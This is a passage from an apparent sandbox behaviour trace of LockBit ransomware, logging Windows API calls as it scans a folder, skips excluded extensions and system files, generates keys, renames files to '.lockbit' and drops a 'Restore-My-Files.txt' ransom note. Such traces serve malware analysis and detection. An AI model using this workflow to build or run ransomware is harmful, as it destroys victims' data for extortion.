(lpString1=".lnk", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00641_.WMF") returned 1 [0162.150] lstrcmpiW (lpString1="ntldr", lpString2="NA00641_.WMF") returned 1 [0162.150] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00641_.WMF") returned 1 [0162.150] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00641_.WMF") returned -1 [0162.150] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00641_.WMF") returned -1 [0162.151] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00641_.WMF") returned 1 [0162.151] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00641_.WMF") returned -1 [0162.151] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.151] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF") returned=".WMF" [0162.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.151] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.151] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.152] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.152] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF.lockbit") returned 72 [0162.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00641_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.153] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.153] malloc (_Size=0x40068) returned 0x3df0008 [0162.153] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1612) returned 1 [0162.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.155] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.157] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.157] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.157] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.158] free (_Block=0x1fa2ed8) [0162.159] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.159] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.159] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7658, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00784_.WMF", cAlternateFileName="")) returned 1 [0162.159] lstrcmpiW (lpString1=".", lpString2="NA00784_.WMF") returned -1 [0162.159] lstrcmpiW (lpString1="..", lpString2="NA00784_.WMF") returned -1 [0162.159] PathFindExtensionW (pszPath="NA00784_.WMF") returned=".WMF" [0162.159] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.159] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.160] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.160] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00784_.WMF") returned 1 [0162.161] lstrcmpiW (lpString1="ntldr", lpString2="NA00784_.WMF") returned 1 [0162.161] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00784_.WMF") returned 1 [0162.161] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00784_.WMF") returned -1 [0162.161] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00784_.WMF") returned -1 [0162.161] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00784_.WMF") returned 1 [0162.161] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00784_.WMF") returned -1 [0162.161] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.161] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF") returned=".WMF" [0162.161] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.161] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.161] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.162] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.163] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF.lockbit") returned 72 [0162.163] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00784_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.167] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.168] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.168] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=30296) returned 1 [0162.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.169] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.169] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.171] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.171] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.171] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.172] free (_Block=0x1fa2ed8) [0162.172] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.172] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.173] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43213500, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x43213500, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x23f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00798_.WMF", cAlternateFileName="")) returned 1 [0162.173] lstrcmpiW (lpString1=".", lpString2="NA00798_.WMF") returned -1 [0162.173] lstrcmpiW (lpString1="..", lpString2="NA00798_.WMF") returned -1 [0162.173] PathFindExtensionW (pszPath="NA00798_.WMF") returned=".WMF" [0162.173] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.173] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.174] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.174] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00798_.WMF") returned 1 [0162.175] lstrcmpiW (lpString1="ntldr", lpString2="NA00798_.WMF") returned 1 [0162.175] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00798_.WMF") returned 1 [0162.175] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00798_.WMF") returned -1 [0162.175] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00798_.WMF") returned -1 [0162.175] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00798_.WMF") returned 1 [0162.175] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00798_.WMF") returned -1 [0162.175] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.175] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF") returned=".WMF" [0162.175] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.175] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.175] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.176] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.177] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.177] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.177] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF.lockbit") returned 72 [0162.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00798_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.178] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.178] malloc (_Size=0x40068) returned 0x3d70450 [0162.178] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9208) returned 1 [0162.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.179] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.186] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.186] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.188] free (_Block=0x1fa2ed8) [0162.188] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.188] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.188] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff 